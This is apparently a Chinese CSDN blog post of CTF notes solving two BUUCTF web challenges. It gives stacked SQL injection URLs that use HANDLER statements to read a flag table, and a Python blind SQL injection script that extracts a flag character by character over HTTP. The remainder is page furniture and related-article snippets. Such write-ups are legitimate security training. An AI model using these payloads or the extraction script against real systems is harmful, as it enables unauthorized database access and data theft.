CTF做题笔记12

最新推荐文章于 2024-07-16 18:50:37 发布
最新推荐文章于 2024-07-16 18:50:37 发布
阅读量419 收藏
点赞数 1
分类专栏: 笔记 文章标签: 学习 网络安全 web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forever_Han13/article/details/124132064
版权

[GYCTF2020]Blacklist

?inject=1%27

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

?inject=1%27;show%20tables;#

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}

array(1) {
  [0]=>
  string(8) "FlagHere"
}

array(1) {
  [0]=>
  string(5) "words"
}

?inject=1%27;show%20databases;#

?inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere read next;handler FlagHere close;#
```txt
array(1) {
  [0]=>
  string(42) "flag{f559de7b-00a5-4ea5-83da-df44858ee86a}"
}

[CISCN2019 华北赛区 Day2 Web1]Hack World

import time

import requests

url = "http://9339d90e-0480-4795-b0c8-93b2cfe5af91.node4.buuoj.cn:81/index.php"
playload = {"id": ""}
flag = ""

for x in range(1, 1000):
    low = 32
    high = 127
    mid = (low + high) // 2
    while low < high:
        playload["id"] = "1^(ascii(substr((select(select(flag))from(flag)),{},1))>{})^1".format(x, mid)
        r = requests.post(url, data=playload)
        r.encoding = "utf-8"
        if r.text.find("Hello") != -1:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if mid == 32 or mid == 132:
        break
    flag += chr(mid)
    print(flag)
    time.sleep(1)

if __name__ == '__main__':
    print(flag)
N1etzsche
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验吧 CTF
Risk2S的小博客
07-09 1199
登录一下好吗 ->运算符叫做“指向结构体成员运算符”,是C语言和C++语言的一个运算符,用处是使用一个指向结构体或对象的指针访问其内成员。 登录 用户名-> ‘=’ 密码-> ‘=’ 那么正常执行的SQL语句就是 select * from 表 where username = “$_POST[‘userneme’]” and password = “$_POST[‘passwo
CTF问题汇总
SuperBeauty的专栏
02-22 670
CTF问题汇总
CTF_Web:攻防世界高手区进阶题WP(9-14)
AFCC_的博客(Web_Dog)
08-08 3074
持续更新ing 0x09 PHP2 题目只有一句话,Can you anthenticate to this website?,其实说实话没什么思路,根据dirsearch的结果,只有index.php存在,里面也什么都没有,各路前辈说index.phps存在源码泄露,于是看了看。 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode
PHP 笔记——Array 数组
weixin_34151004的博客
04-05 1162
要点 说明 数组构成 数组是由一个或多个数组元素组成的 数组元素 每个数组元素由键(Key)和值(Value)构成 键 元素的识别名称,也被称为数组下标 值 元素的内容 映射 键 和 值 之间存在一种对应关系,称之为映射 类型划分 根据键的数据类型,可以将数组划分为索引数组和关联数组 1、索引数组 索引数组是指键名为整数的数组。默认情况下,索引数组的键名是从...
实验吧CTFWeb writeup 第二部分
Senimo
08-21 1074
实验吧CTFWeb writeup 第二部分天网管理系统忘记密码了Once MoreGuess Next SessionFALSE上传绕过NSCTF web200程序逻辑问题what a fuck!这是什么鬼东西?PHP大法这个看起来有点简单!貌似有点难头有点大猫抓老鼠看起来有点难 天网管理系统 分值:10 难度:易 天网你敢来挑战嘛 格式:ctf{ } 解题链接 忘记密码了 分值:20 难度:...
ctf-writeups:BOF七叶树局的报道
03-16
结合【压缩包子文件的文件名称列表】"ctf-writeups-master",我们可以推测这个压缩包包含的是一个名为"ctf-writeups"的项目主目录,可能含有作者在CTF比赛中解决各种挑战的详细报告、源代码、笔记、调试日志和其他...
CTF撰写:CTF挑战的撰写
02-11
CTF(Capture The Flag)是一种网络安全竞赛..."CTF-writeups-main"这个文件名可能是指包含一系列CTF挑战解答的文章或者笔记,这些内容可以帮助参赛者理解挑战的解决方法,同时也是组织者和爱好者交流经验的重要资源。
ctf-writeups:我的CTF文章集
04-04
【描述】"CTF撰写"部分表明这个集合主要是作者撰写的文章,旨在分享他在CTF比赛中的解题思路和技巧。这些文章很可能涵盖了如何解析二进制代码、识别和利用漏洞、编写payload等方面,特别是对于逆向工程和PWN类问题的...
sudoutopia.github.io:我在其中发布研究,笔记CTF文章的博客
03-06
研究可能涵盖各种IT领域的深入探索,笔记则可能是作者在学习过程中积累的知识点记录,而CTF文章则表明作者可能参与过网络安全竞赛,并愿意分享相关的解题技巧和经验。CTF是一种流行的网络安全教育和竞赛形式,涵盖了...
setup_ctf_repo:用于建立存储库的工具集(用于CTF
04-28
6. **创建和组织文件**:脚本可能会生成一些标准的CTF项目结构,如挑战分类、解题笔记、代码库等。 7. **初始化版本控制**:`setup.rb`可能还会初始化一个新的Git仓库,并创建第一个提交。 8. **权限设置**:对于...
ctf中代码审计以及自己的总结
weixin_43999372的博客
02-22 5350
in_array :(PHP 4, PHP 5, PHP 7) 功能 :检查数组中是否存在某个值 定义 : bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) 在 $haystack 中搜索 $needle ,如果第三个参数 $strict 的值为 TRUE ,则 in_array() 函数会进行强检查,检查 $needle 的类型是否和 $haystack 中的相同
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1573
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
BUU刷题记录——4
weixin_43610673的博客
08-31 1705
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
探索Perl语言:入门学习与实战指南
洛秋的博客
07-15 706
Perl(Practical Extraction and Report Language)由Larry Wall于1987年创建,旨在帮助系统管理员简化日常任务。高效灵活:Perl的语法灵活多样,支持多种编程风格(过程式、面向对象等)。强大的文本处理能力:内置强大的正则表达式支持,是处理文本数据的利器。丰富的模块库:通过CPAN(Comprehensive Perl Archive Network)可以方便地获取和使用各类模块。Perl广泛应用于系统管理、Web开发、网络编程、数据库操作等领域。
NumPy库学习之np.random.rand函数
qq_46396470的博客
07-15 182
是 NumPy 库中的一个函数,用于生成随机数。这些随机数是从均匀分布 [0, 1) 中抽取的,即每个数都在0到1之间,但不包括1。
钓鱼攻击 - 基础学习
最新发布
Reset
07-16 409
钓鱼攻击是一种典型的欺诈式攻击手段,攻击者通过伪装成可以信任的角色,利用电子邮件或其他通信渠道向被攻击者发送植入了木马的文档或恶意链接,并诱骗被攻击者点击执行,从而实现对被攻击者计算机的远程控制或恶意程序感染。
python 语法学习 day 7
2303_79973545的博客
07-15 236
-----元组之间可以进行比较,比较的规则是逐个比较元组中的元素。首先比较第一个元素,如果相等,则比较第二个元素,以此类推。如果所有元素都相等,那么元组相等;否则,比较的结果取决于第一个不相等元素的比较结果。题意:统计单词的种类以及数量(忽略大小写),最终以降序输出(出现次数相同的单词根据单词的大小升序输出)-------掌握如何将一个英语句子中的单词拆出来,并且去掉标点符号。EOF,输入后产生异常-->>捕获异常,结束输入。第一次提交的答案是:先把所有输入值放在列表里面。------字典排序。
安卓学习中遇到的问题【bug】
小心星的博客
07-15 815
安卓学习中遇到的问题【bug】
ctf garden解题
04-30
CTF Garden是一个在线的CTF(Capture The Flag)平台,提供了各种类型的解题挑战,旨在帮助安全爱好者提升技能和知识。在CTF Garden中,你可以通过解决各种不同难度的题目来学习和实践网络安全相关的技术。 解题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值